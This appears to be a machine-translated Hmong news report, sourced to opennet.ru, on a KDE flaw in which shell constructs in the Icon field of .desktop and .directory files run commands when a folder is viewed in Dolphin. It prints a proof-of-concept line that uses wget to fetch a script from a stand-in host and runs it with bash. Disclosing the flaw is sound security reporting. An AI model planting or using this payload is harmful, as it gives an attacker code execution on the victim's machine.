Hauv KDE , uas tso cai rau tus neeg tawm tsam los ua cov lus txib tsis txaus ntseeg thaum tus neeg siv saib cov npe lossis cov ntaub ntawv khaws cia tshwj xeeb uas tsim ".desktop" thiab ".directory" cov ntaub ntawv. Kev tawm tsam xav kom tus neeg siv tsuas saib cov npe ntawm cov ntaub ntawv hauv Dolphin cov ntaub ntawv tus thawj tswj hwm, rub tawm cov ntaub ntawv tsis zoo desktop, lossis rub lub shortcut mus rau lub desktop lossis rau hauv ib daim ntawv. Qhov teeb meem tshwm sim nws tus kheej hauv kev tso tawm tam sim no ntawm cov tsev qiv ntawv thiab cov laus dua, mus txog KDE 4. Qhov tsis muaj zog tseem nyob (CVE tsis muab).
Qhov teeb meem yog tshwm sim los ntawm kev siv tsis raug ntawm KDesktopFile chav kawm, uas, thaum ua cov "Icon" hloov pauv, yam tsis muaj kev khiav tawm, hla tus nqi mus rau KConfigPrivate::expandString() muaj nuj nqi, uas ua rau nthuav dav ntawm lub plhaub tshwj xeeb cim, suav nrog kev ua haujlwm. cov hlua "$ (..)" raws li cov lus txib kom ua tiav . Contrary to the requirements of the XDG specification, kev siv shell constructs yog tsim los tsis cais hom kev teeb tsa, i.e. tsis tsuas yog thaum txiav txim siab kab hais kom ua ntawm daim ntawv thov yuav tsum tau pib, tab sis kuj thaum qhia meej cov cim tso tawm los ntawm lub neej ntawd.
Piv txwv li, mus tua xa tus neeg siv lub zip archive nrog cov npe uas muaj ".directory" cov ntaub ntawv xws li:
[Desktop Nkag] Hom = Phau Ntawv Qhia
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Thaum koj sim saib cov ntsiab lus ntawm cov ntaub ntawv khaws cia hauv tus neeg saib xyuas cov ntaub ntawv Dolphin, tsab ntawv https://example.com/FILENAME.sh yuav raug rub tawm thiab ua tiav.
Tau qhov twg los: opennet.ru